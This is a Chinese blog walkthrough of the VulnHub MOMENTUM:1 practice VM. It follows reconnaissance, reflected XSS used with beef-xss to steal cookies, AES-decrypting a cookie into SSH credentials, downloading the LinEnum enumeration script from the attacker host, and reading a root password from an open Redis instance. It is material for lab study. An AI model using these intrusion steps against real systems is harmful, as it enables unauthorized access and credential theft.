VulnHub-MOMENTUM: 1靶机
前言:
在VulnHub官网上下载好MOMENTUM: 1靶机,并直接用VM导入打开。
攻击机kali:192.168.2.87
靶机IP:192.168.2.92
信息收集:
扫描靶机ip;
arp-scan -l
得到靶机ip;
扫描靶机开放的端口;看见开放了22,80端口。
访问80端口http://192.168.2.92,得到一个有四张图片的网站,话不多说,直接进行目录扫描;
dirmap目录扫描:
事无巨细,一个个排查,一个apache的说明文档本以为是有漏洞可利用,用msf简单搜索了一下并没有可用模块,暂时放弃 ,还有个/css文档style.css内容正常,其他的/image是主页的四张图片没什么有利用的价值,接下来只剩下个js文件了。
http://192.168.2.92/manual/en/index.html
访问js文件
http://192.168.2.92/js/main.js
上面看见了window.location.href = "opus-details.php?id="+str; 当中的window.location.href的意思是可以理解为重定向,就是原url加上后面的值opus-details.php?id=+str;
利用hackbar插件在最基础的url上添加以下代码,在id后面尝试各种输入的值,发现输什么就回显什么;判断有xss;
http://192.168.2.92/opus-details.php?id=1
攻击开始:
开启kali的beef-xss工具,启动服务并在被攻击网站插入payload,获得cookie等信息
得到cookie等信息
拿到cookie有点迷茫,也只有cookie,回头再回忆一遍,nmap扫描端口时除了有个80端口还有个22的ssh端口,但是我们并没有登录的账号密码,想爆破一下,但是我简单的爆破发现并没什么用,之后看见js文件中还有一段被忽略的代码!这很重要。
这串代码是一串用于加密的代码;用的是AES加密方法,但是加密 的是什么并不知道,但是我们拿到的差不多只有cookie,所以尝试!记得后面给了个AES的密码参数值"SecretPassphraseMomentum"我是用下面这个网站解密的,网站有很多大家都可以直接搜到也可以参考
https://www.browserling.com/tools/aes-decrypt
解密获得的字符串"auxerre-alienum##"得到这个能干嘛呢?回想刚刚的ssh缺的就是账号密码所以;尝试!
登录ssh;技术不济登录了十几分钟,多次试错成功登录;用户名是auxerre;密码是auxerre-alienum##;没错就是一整个。
竟然误打误撞拿到个flag;还是要提权的,实在不想搞。但是还得坚持。
提权:
使用liunx的一个提权信息收集脚本——LinEnum,提权用的脚本不止这一个还有很多参考下载链接,直接下载,github有说明教程。
https://github.com/rebootuser/LinEnum
开始提权,首先需要在本地搭建一个http的server。利用python提供的Web模块来启动。
python -m SimpleHTTPServer 8888
python3的话用 下面这个命令启动http
python3 -m http.server 8888
下载安装好的LinEnum
wget http://192.168.2.87:8888/LinEnum
查看LinEnum.sh权限,并给予执行权限,并执行。
执行之后有一大堆,别慌,从上网下看,先看见版本信息,还是挺高的。
再看下开放的端口和进程。发现个可疑端口"6379",不急继续往下看。
看suid,并没发现什么可疑文件。
那就继续从可疑的端口开始找吧,6379端口是一个数据库端口,而且还不是关系型数据库 ——Redis;直接连接数据库并查找key,不懂的可以搜一下,继续我们看见有一个"rootpass"查看一下
拿到密码,退出redis,在靶机中输入su root进入root用户
查找flag:
拿到最后一个flag!!
结束!!!
VulnHub-MOMENTUM: 1靶机相关推荐
- 渗透测试靶机搭建_对vulnhub中Android4靶机渗透测试全过程!
Android4靶机简介 名称:Android4 操作系统:Android v4.4 标志:/data/root/(在此目录中) 等级:初学者. 下载链接:Android4:https://downl ...
- vulnhub之DC8靶机
目录 介绍 信息收集 主机发现 主机信息探测 访问网站 目录扫描 漏洞发现 手工SQL联合查询注入 1. 判断列数,得知是1列 2. 数据查询&信息收集(union select) 3. 获取 ...
- vulnhub之DC1靶机
靶机概览 信息收集 nmap信息收集 网站信息收集 使用nikto来收集一下 渗透攻击 getshell Flag1 Flag2 进入数据库 拿下数据库的root账号 登录网站 Flag3 Flag4 ...
- vulnhub之DC9靶机
目录 介绍 信息收集 主机发现 主机信息探测 访问网站 爆破网站-失败 漏扫网站 sqlmap注入 任意文件读取漏洞 SSH爆破 信息收集 二次SSH爆破 提权方式1 提权方式2 参考 介绍 系列: ...
- 玩转靶机Vulnhub:DC1(详细)
靶机Vulnhub:DC1 靶机和环境准备: 主机发现: 信息收集: 发现并利用漏洞 SUID提权: 总结: 靶机和环境准备: 宿主机:kaili dc1靶机下载:DC: 1 ~ VulnHub 主机 ...
- 漏洞payload 靶机_hackme:2 靶机攻略
原标题:hackme:2 靶机攻略 0x01 背景: hackme:2是vulnhub上的一个medium难度的CTF靶机,难度适中.内容丰富,贴近实战.而且没有太多的脑洞,适合安全工作者们用来练习渗 ...
- vulnhub Gigachad 靶场练习
前言 这次我们练习的靶机是从vulnhub下载的靶机Gigachad:1,该靶机的难易程度为简单. 下载地址为https://www.vulnhub.com/entry/gigachad-1,657/ ...
- dc-3 靶机渗透学习
靶机修复 dc-3靶机可能会存在扫不到靶机ip的问题,可以参考下面这篇博客解决,编辑网卡配置文件时命令有点错误. vim /etc/network/interfacers 改成 vim /etc/ne ...
- DAY29(DAY30拓展):Vulnhub--靶机实战
DAY29:vulnhub 靶机实战 1.vulnhub(DC-1 靶机) 打开靶机 扫描存活主机确定 DC-1 的ip地址,使用 nmap nmap -sS 网段 nmap -sP 192.168. ...
最新文章
- python中使用html前端页面显示图像预测结果(Pycharm)
- 手把手教你用线性回归预测二手房房价
- hadoop学习之一
- 实录分享 | 计算未来轻沙龙:大规模数据存储与挖掘(PPT下载)
- DPDK 18 log日志系统使用
- Linux系统管理员的Bash指南,11条Bash实践经验!
- Spring获取JavaBean的xml形式和注解形式
- python接口测试框架django_开源~自研接口测试平台 Django2.0+Vue
- 元胞计算机系统,元胞自动机
- USB2.0学习笔记连载(一):CY7C68013特性简介
- leetcode字节跳动探索
- 国产环境小卫星数据预处理及简单应用
- SAP固定资产业务场景及方案
- 人工智能 - 人脸合成 (腾讯AI开放平台)
- 关于BASE编码 16 32 36 58 64 58 91
- 银行业的python项目_python练习项目(银行)——开户和查询
- 手机文件夹为什么是英文?哪些可以删除?看完清理能多出10G内存
- 上海交通大学教授金耀辉:AI在智慧法院中的应用
- 黑鲨3能升级鸿蒙5g吗,红魔5g和黑鲨3哪个好-红魔5g和黑鲨3参数对比
- 那些年我记下的一些编程错误
热门文章
- 汽车报户计算机自动选号,【国内】全国将统一机动车号牌选号 号码全由计算机随机投放...
- 食品网站和学校网站设计区别于总结
- gdb arm linux 下载,月光软件站 - 编程文档 - 其他语言 - 关于ARM Linux下的GDBServer
- 羊皮卷的故事-第七章
- [构造]Array 2022牛客多校第6场 A
- java实现直角三角形、倒三角和等腰三角形的实现
- CFD解决一维标量问题(迎风、Lax-Wendroff、TVD、WENO5+3阶Runge-Kutta)
- fastboot 快速引导模式 介绍
- 信息学奥赛一本通1244 和为给定数
- buddypress主题_WordPress的十大BuddyPress插件